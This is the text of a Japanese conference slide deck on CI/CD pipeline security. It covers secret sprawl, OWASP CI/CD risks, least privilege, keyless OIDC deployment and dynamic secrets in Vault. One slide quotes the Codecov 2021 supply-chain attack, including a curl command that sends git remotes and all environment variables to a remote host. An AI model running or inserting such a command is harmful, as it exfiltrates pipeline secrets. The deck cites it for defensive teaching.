CI/CD Conference 2023で発表した資料です。セッション動画の視聴はこちら https://event.cloudnativedays.jp/cicd2023/talks/1760
自分のデータは自分で守るあなたのCI/CDパイプラインをセキュアにする処方箋
View Slide
Kazuto Kusama@jacopenSenior Solutions Engineer @HashiCorp JapanCo-Chair @CloudNative DaysOrganizer @PaaSJPOrganizer @Platform Engineering Meetup
何をするにもCI/CD無しには語れない時代になりました
CI/CDはDevOpsやCloud Native技術の根幹Dev OpsConfigureVerify Package Plan MonitorReleaseCreate Plan
9/10Web アプリケーションへの侵害のうち、クレデンシャルに起因するもの過去2年間におけるデータ侵害の増加率セキュリティ侵害のうち、人的要素が関与しているもの380% 82%セキュリティ侵害に関するデータ
CI/CDのセキュリティは難しいDevCodeRepositoryCI/CD
CI/CDのセキュリティは難しいDevCodeRepositoryCI/CDクライアントサイドへの攻撃サプライチェーンへの攻撃ツールへの攻撃 サーバーサイドへの攻撃対処しなければならない場所が多い
CI/CDのセキュリティは難しいDevCodeRepositoryCI/CDクライアントサイドへの攻撃サプライチェーンへの攻撃ツールへの攻撃 サーバーサイドへの攻撃CI/CDツールは本番環境にアクセスしやすい
外部サービスからの流出
CI/CDのセキュリティは難しいDevCodeRepositoryCI/CDツールへの攻撃本番環境が直接危機にさらされるここをやられたので
責任の主体やらかしたのがSaaS側であっても、エンドユーザーに発生した被害の責任は自分でとらなくてはいけません。
こういうときに絶対にやってはいけない対処
問題のある対処利用している○○のSaaSでセキュリティインシデントがおきました⇒ なので、そのSaaSはやめて別のSaaSに切り替えました!
問題のある対処利用している○○のSaaSでセキュリティインシデントがおきました⇒ なので、そのSaaSはやめて別のSaaSに切り替えました!何も解決していない!
問題の本質はどこにあるか● SaaSでセキュリティインシデントが起きたことは事実として・・・○ 何故シークレットが漏れて問題になったか■ シークレットを持たせる必要はあったか■ 漏れても影響の少ないシークレットに出来なかったか■ 漏れても問題がないように出来なかったか○ 漏れないような管理は本当に不可能だったのか
問題の本質はどこにあるか● SaaSでセキュリティインシデントが起きたことは事実として・・・○ 何故シークレットが漏れて問題になったか■ シークレットを持たせる必要はあったか■ 漏れても影響の少ないシークレットに出来なかったか■ 漏れても問題がないように出来なかったか○ 漏れないような管理は本当に不可能だったのかこのあたりの深掘りが出来ていないと、結局乗り換え先でまたインシデントが起きたときに同じことを繰り返す
既存のフレームワークを活用して対策していく
サイバー攻撃の構図(Mitre ATT&CK Framework)MITRE ATT&CKで始める脅威ベースのセキュリティ対策入門( 1)https://atmarkit.itmedia.co.jp/ait/articles/2207/21/news003.html
… より強いレベルの権限を取得PrivilegeEscalationCredentialAccess… アカウントのユーザ名やパスワードを盗難LateralMovement… 自社の環境内で横断的な活動… データを盗難ExfiltrationInitialAccessアタッカーが自社のネットワークにアクセスサイバー攻撃の構図 (Mitre ATT&CK Framework)
OWASP Top 10 CI/CD Security Riskshttps://owasp.org/www-project-top-10-ci-cd-security-risks/
今回は、シークレットの管理を中心に話します
次の時間帯のセッションも併せて見てみるといいかも
全体方針大原則: セキュリティリスクを許容範囲なレベルまで減らす大方針: 全てのシークレットを正しく管理下に置く正しい管理とは:- 保存場所の管理- 権限の管理- 期間の管理- ログの管理
CIとCDの流れDevCodeRepositoryCI CD開発環境ステージング本番
CIとCDの流れDevCodeRepositoryCI CD開発環境ステージング本番最終的にはここの権限を奪うのが目標
パイプラインごとにいろんな権限が必要になるから、広めの権限を与えておこう
CICD-SEC-2 不十分な ID およびアクセス管理過度に寛容な IDDevCodeRepositoryCI CD開発環境ステージング本番なんでも出来るIDクラウド上でやりたい放題
CICD-SEC-2 不十分な ID およびアクセス管理過度に寛容な ID対策: 最小権限の原則DevCodeRepositoryCI CD開発環境ステージング本番Deliveryに必要な最小権限のみを付与する。違うパイプラインには違う権限を付与する
シークレットをリポジトリに入れるのは良くないけど、プライベートだからセーフでしょ
CICD-SEC-6 不十分な認証情報衛生認証情報を含むコードがSCM リポジトリのブランチの一つにプッシュされているDevCodeRepositoryCI CD開発環境ステージング本番
DevCodeRepositoryCI CD開発環境ステージング本番誤ってパブリックリポジトリにfork悪意のある内部の人間がリポジトリを閲覧(検出が困難)サプライチェーン攻撃でリポジトリ内のシークレットを取得
実際の攻撃事例Uber(2016): GitHubのPrivate Repositoryに保存していたAWSキーを悪用され、S3に不正アクセスされたことにより数百万の顧客情報が流出Samsung(2019): 自前で運用していたGitLabのリポジトリが、設定漏れによりパブリックに公開され、その中のAWSキーが流出。ログや分析データの入った100以上のS3 Bucketにアクセス可能にその他多数の事例あり
Kubernetesの場合特に注意gitops安易なGitOpsの実現のため、SecretをManifest Repositoryに入れてしまうapiVersion: v1kind: Secretmetadata:name: credsdata:password: cEBzc3cwcmQ=username: YWRtaW4=ただのbase64エンコードなので、平文と同じ
CICD-SEC-6 不十分な認証情報衛生認証情報を含むコードがSCM リポジトリのブランチの一つにプッシュされている対策: リポジトリに入れない。シークレットマネージャの活用DevCodeRepositoryCI CD開発環境ステージング本番安全に管理されたSecretmanager上に集中管理
とりあえず使いやすい場所にシークレットを入れておこう
CICD-SEC-7 安全でないシステム構成システム構成が安全でないシステムDevCodeRepositoryCI CD開発環境ステージング本番
CICD-SEC-7 安全でないシステム構成システム構成が安全でないシステムDevCodeRepositoryCI CD開発環境ステージング本番様々な場所にキーが散らばって管理されているSecret Sprawlデフォルト設定のままシークレットストアに管理されている
その置き場所、安全ですか?置き場所が散らばることによるリスク● 散らばったシークレットを管理していくことは困難● 有効期限の長いシークレットが放置されてしまう● アクセス制御やロギングが備わっていない場所も多い○ 有効期限が無限に設定されているクラウドのシークレットが、アクセス制御やログが取られていない環境から盗まれたとしたら、どうやって気づく?シークレットストアをデフォルト設定で使うリスク● デフォルト設定では細かなアクセス制御がなされてないことが多い● ブランチや環境が異なっても同じシークレットにアクセスが出来てしまう
CICD-SEC-7 安全でないシステム構成システム構成が安全でないシステム対策: 適切な構成DevCodeRepositoryCI CD開発環境ステージング本番適切なチームとロールの設定GitHub ActionsSecretsの利用DeploymentEnvironmentsの活用
CICD-SEC-7 安全でないシステム構成システム構成が安全でないシステム対策: シークレットマネージャの活用DevCodeRepositoryCI CD開発環境ステージング本番安全に管理されたSecretmanager上に集中管理
CIのパイプラインでそのままCDもしちゃおう
CICD-SEC-3 依存チェーンの悪用CICD-SEC-4 有害なパイプライン実行CICD-SEC-5 不十分なパイプラインベースのアクセス制御DevCodeRepositoryCI CD開発環境ステージング本番CIもCDも、全部同じパイプラインでやっている
CICD-SEC-3 依存チェーンの悪用CICD-SEC-4 有害なパイプライン実行CICD-SEC-5 不十分なパイプラインベースのアクセス制御DevCodeRepositoryCI CD開発環境ステージング本番悪意のあるForkからのPR不十分なアクセス制御による改変サプライチェーンへの攻撃
実際の攻撃事例Codecov(2021): カバレッジ計測のためのツールに、以下のようなコードが追加されるcurl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” https://IPADDRESS/upload/v2 || trueGitのリポジトリと環境変数が送信されるようになっていた=> 環境変数内にシークレットが含まれていた場合は漏洩してしまう。セルフホストのCIツールやRunnerを使っていても同様に影響を受けてしまう
CICD-SEC-3 依存チェーンの悪用CICD-SEC-4 有害なパイプライン実行CICD-SEC-5 不十分なパイプラインベースのアクセス制御対策:DevCodeRepositoryCI CD開発環境ステージング本番適切なアクセス制御適切なレビュー実行環境の隔離SBOM
CICD-SEC-3 依存チェーンの悪用CICD-SEC-4 有害なパイプライン実行CICD-SEC-5 不十分なパイプラインベースのアクセス制御対策: CIとCDの環境を分離DevCodeRepositoryCI CD開発環境ステージング本番CDは本番環境に直接の権限を持っているため、分離しておくCIで必要な権限だけを持たせる
たとえばCICD
CI/CDで使うクラウドのキーは、一度作成したらあとはシークレットストアに置いておくだけ
CICD-SEC-6 不十分な認証情報衛生ローテーションされない認証情報DevCodeRepositoryCI CD開発環境ステージング本番2年前1年前2年前3年前1年前『壊れていない限りは手を入れなくて良い』の考えのもと、同じシークレットを使い続けてしまう結果として有効なキーを所持する人・システムが増え続け、漏洩の危険性が飛躍的に高まっていく。
外部サービスからの流出ローテーションされていないシークレットは、大規模な流出事故で漏れ出す可能性があるほか、知らないうちに知らない場所から漏れる可能性もある。事故が発覚した場合、多大な時間を割いてシークレットの棚卸しとローテーションを行う必要がある。例えばこういう漏洩事故が起きたとしても、そのキーが数分間しか有効ではない場合は、リスクを大きく低減することができる。
CICD-SEC-6 不十分な認証情報衛生ローテーションされない認証情報対策: キーレスの活用DevCodeRepositoryCI CD開発環境ステージング本番クラウド側とOIDCで信頼関係を確立し、静的なキー無しでもデプロイできるようにする
CICD-SEC-6 不十分な認証情報衛生ローテーションされない認証情報対策: 動的シークレットの実践DevCodeRepositoryCI CD開発環境ステージング本番必要な時に、必要なキーをジャストインタイムで発行させる。不要になったら、明示的 or自動的に削除する
動的シークレットシークレットが必要な時に、Vaultに発行を依頼する。Vaultはその対象の一時的なシークレットを発行し、クライアントに返す。①キーをリクエストAWSのIAMキーが欲しいCIに使うのでMySQLのUser/Passが欲しい
動的シークレットシークレットが必要な時に、Vaultに発行を依頼する。Vaultはその対象の一時的なシークレットを発行し、クライアントに返す。②対象に対してユーザーやキーを発行
動的シークレットシークレットが必要な時に、Vaultに発行を依頼する。Vaultはその対象の一時的なシークレットを発行し、クライアントに返す。③クライアントにキーを渡す
動的シークレットクライアントがRevokeを指示した場合、Vaultはそのシークレットを消すrevoke使い終わったからもう要らない対象のキーを削除
動的シークレット作成したシークレットには必ず生存期間(TTL)が設定されており、期限が切れたら自動的にVaultが消してくれる。なので、明示的に消しに行かなくても安全性が保たれる対象のキーを削除TTLを超える
シークレットエンジンAWS Secret Engine / Azure Secret Engine / Google Cloud Secret Engine各クラウドプロバイダーのアクセスキーを動的に作成できる仕組み。AWSならIAMキー、Google CloudならService AccountなどDatabase Secret Engineさまざまなデータベースのユーザー/パスワードを動的に作成出来る。MySQL,PostgreSQL,Oracle,SQL Server, MongoDB, Cassandra, Elasticsearch,RedisなどなどSSH Secret EngineOTP認証やSSH証明書認証を利用してSSHの認証を動的に行うVault Plugin for Gitlab Project Access Token (community)Vault Plugin Secrets GitHub (community)GitHubやGitLabのTokenを動的に作成する
まとめ● CI/CDのセキュリティは非常に難しい。しかし最善を尽くさないといけない● やらかしたのが自分でなくても、エンドユーザーに発生した被害の責任は自分でとらないといけない● CI/CD潜むさまざまなリスクを洗い出し、許容可能なレベルに下げていく取り組みが必要● CI/CDにおけるシークレット管理はそのうちの一つ● 保存場所、権限、期間、ログなどを適切に管理し、リスクを下げていくことが重要
jacopen
startree
chmikata
nenonaninu
yayoi_dd
victorrentea
yoshikikomoriya
yuya4
iselegant
soracom
ryohatanmonolog
sasakitomohiro
hayaok3
frogandcode
mza
jonrohan
bcantrill
zakiyama
ddemaree
afnizarnur
geoffreycrofte
eitanlees
dougneiner
kneath
andyhume